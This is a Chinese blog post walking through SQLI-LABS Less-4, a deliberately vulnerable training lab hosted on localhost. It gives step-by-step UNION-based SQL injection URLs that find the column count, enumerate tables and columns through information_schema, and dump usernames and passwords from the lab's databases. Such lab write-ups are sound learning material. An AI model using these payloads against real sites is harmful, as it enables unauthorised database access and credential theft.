SQLI-LABS Page 1 ——Less 04

最新推荐文章于 2022-11-09 13:34:22 发布
最新推荐文章于 2022-11-09 13:34:22 发布
阅读量111 收藏
点赞数
分类专栏: SQL注入 文章标签: less 前端 css
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59098212/article/details/125225779
版权

1、判断是否动、静态页面

http://localhost:9898/Less-4/?/id=2;可以判断参数是id,id值不一样,显示页面不同

2.判断是否存在注入

可用\号来查看构造闭合,分别用http://localhost:9898/Less-4/?id=1") and 1=1-- qwe和http://localhost:9898/Less-4/?id=1") and 1=2-- qwe来进行探测

 

3.判断字段数

用order by判断字段数(二分法)

http://localhost:9898/Less-4/?id=1") order by 10-- qwe

 

 

 经过二分法发现字段数为3。

4.判断显错位

http://localhost:9898/Less-4/?id=999") union select 1,2,3-- qwe

5.判断库名和数据库版本

http://localhost:9898/Less-4/?id=999") union select 1,version(),database()-- qwe

 数据库版本为5.0,当前数据库库名security。

6.判断表名

http://localhost:9898/Less-4/?id=999") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()-- qwe

7.判断列名

http://localhost:9898/Less-4/?id=999") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'-- qwe

8.寻找具体数据

http://localhost:9898/Less-4/?id=999") union select 1,group_concat(username),group_concat(password) from users-- qwe

上列结果便是获取security数据库的用户和密码。

 

注入旁库

?id=999") union select 1,group_concat(schema_name),3 from information_schema.schemata-- qwe

 ?id=999") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='root'-- qwe

?id=999") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='root' and table_name='users'-- qwe

?id=9999") union select 1,group_concat(user),group_concat(password) from root.users-- qwe

 上列结果是旁库获取root数据库中用户和密码。

张潇晨
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
SQLI-LABS Page 1 ——Less 03
m0_59098212的博客
06-10 127
sqli注入
初学SQLi-LABS过关分享Less-3
SenTouKiReI的博客
06-10 759
初学sql注入SQLi-LABS过关分享Less-3
sqli-labs-less-4图文详解,适合小白
yzcn
10-23 1386
Less-4 less1-3以发布,1-4题相关知识点在https://blog.csdn.net/qq_46432288/article/details/109226871中,点击查看吧!!! less-4与1-3方法基本一致,只是最开始的判断注入点有一点差别。 判断注入: http://127.0.0.1/sqli-labs-master/Less-4/?id=1 显示正常 http://127.0.0.1/sqli-labs-master/Less-4/?id=1’ 显示正常 http://12
sqli-labs Less-4
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-03 318
sqli-labs Less-4 本系列文章使用的靶场环境为sqli-labs 环境下载地址:https://github.com/Audi-1/sqli-labs 持续跟新,一直到通过此靶场为止 1.判断注入类型 index.php?id=1" 单引号回显正常,双引号会报错 然后根据报错,我们可以得知这个sql注入页面的使用双引号和括号进行闭合。 2.猜...
sqli-labs/Less-4
m0_71299382的博客
11-09 91
sqli-labs第四关
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
ServerScoket与Socket的关系
zsxdmsr115的博客
01-19 847
SeverSocket就还好比站在酒店门口的迎宾小姐,而Socket好比顾客,迎宾小姐的工作就是迎接到来的顾客。 下面我们言归正传。 创建服务器:ServerSocket serverSocket = new ServerSocket(端口号);我们可以创建一个工具类专门用来读数据这里写代码片 public class Util(){ public static String
springMVC之常用注解
qq_32658439的博客
08-15 93
RequestMapping请求映射方式 1.规则: @RequestMapping可以设置在类上,也可以设置在方法上 请求的映射规则是:类上的RequestMapping + ‘/’+ 方法上的RequestMapping 如果没有写 / ,SpringMVC会自动补全 类上的RequestMapping可以省略,这时直接用方法的RequestMapping访问 路径不可重...
tomcat启动时出现了Failed to start component [StandardEngine[Catalina].StandardHost[localhost]]
xhudqlg的博客
08-09 1万+
    tomcat启动:Failed to start component [StandardEngine[Catalina].StandardHost[localhost].StandardContext[]] java.util.concurrent.ExecutionException: org.apache.catalina.LifecycleException: Failed t...
sqli-labs—————Less-4
Fly_鹏程万里
05-08 651
Less4根据要求传入参数id,数据类型numeric添加单引号、and 1=1  、and 1=2进行测试感觉是不是非常奇怪,为什么都是正确显示页面呢?我们不妨再试试双引号注入代码之后,我们得到了下面这个错误You have an error in your SQL syntax; check the manual that corresponds to your MySQL server ve...
通过sqli-labs学习sql注入——基础挑战之less1-10
热门推荐
giantbranch的专栏
05-02 5万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/51207833 虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方...
Sqli-Labs之less-3
ISNS的博客
02-05 1087
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 目前看来,这几关都是基于less-1的思路,所以详细过程参见: Sqli-Labs之less-1 less-3的主要的变化还是在于注入点的判断: 后续的操作就一样了: ...
Sqli-labs之Less1-10
Mi1k7ea
04-14 4510
为了更好地学习SQL注入,便从sqli-labs开始入手吧。很多东西都是不懂,所以也是从各位前辈、大牛的博客以及书籍中去学习,将自己学到的都记录一下,以便以后的查看。同时也希望各位能够多多给点指导,让本人能够更好地掌握各种方法技巧等等。 为了更方便地实现操作,直接用Firefox的HackBar插件来操作~ Less1--基于错误的单引号字符型注入 直接在url中输入?id=1可以看
sqli-labs (less1-less4)
Xi4or0uji
07-24 1710
就只是随便记一记 less 1 get方法的引号闭合 id=1'有报错,证明有注入点,然后接下来是看一下有多少列 ?id=-1' union select 1,2,3--+' 这里我们如果只是写select后面加三个以下数字都会报错,证明里面是有三列的,用order by 也可以查出来 剩下的就是爆数据库,表,字段,值了 爆数据库 ?id=-1' union select 1,gr...
Nginx将请求转发至后端应该怎么做?
J_Lee
10-29 1万+
Nginx将请求转发至后端应该怎么做?
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值